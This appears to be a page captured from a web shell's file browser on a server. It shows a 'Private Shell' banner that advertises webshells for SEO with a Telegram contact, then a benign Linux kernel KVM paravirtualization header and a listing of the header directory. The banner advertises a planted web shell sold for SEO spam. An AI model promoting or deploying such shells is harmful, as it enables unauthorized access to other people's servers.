__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ #ifndef _UAPI_ASM_KVM_PARA_H #define _UAPI_ASM_KVM_PARA_H #include <linux/types.h> /* * CPUCFG index area: 0x40000000 -- 0x400000ff * SW emulation for KVM hypervirsor */ #define CPUCFG_KVM_BASE 0x40000000 #define CPUCFG_KVM_SIZE 0x100 #define CPUCFG_KVM_SIG (CPUCFG_KVM_BASE + 0) #define KVM_SIGNATURE "KVM\0" #define CPUCFG_KVM_FEATURE (CPUCFG_KVM_BASE + 4) #define KVM_FEATURE_IPI 1 #define KVM_FEATURE_STEAL_TIME 2 /* BIT 24 - 31 are features configurable by user space vmm */ #define KVM_FEATURE_VIRT_EXTIOI 24 #define KVM_FEATURE_USER_HCALL 25 #endif /* _UAPI_ASM_KVM_PARA_H */
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Kbuild | File | 60 B | 0644 |
|
| auxvec.h | File | 426 B | 0644 |
|
| bpf_perf_event.h | File | 259 B | 0644 |
|
| break.h | File | 918 B | 0644 |
|
| byteorder.h | File | 356 B | 0644 |
|
| hwcap.h | File | 767 B | 0644 |
|
| kvm.h | File | 4.69 KB | 0644 |
|
| kvm_para.h | File | 669 B | 0644 |
|
| perf_regs.h | File | 1 KB | 0644 |
|
| ptrace.h | File | 1.67 KB | 0644 |
|
| reg.h | File | 1.54 KB | 0644 |
|
| sigcontext.h | File | 1.38 KB | 0644 |
|
| signal.h | File | 284 B | 0644 |
|
| ucontext.h | File | 1.34 KB | 0644 |
|
| unistd.h | File | 91 B | 0644 |
|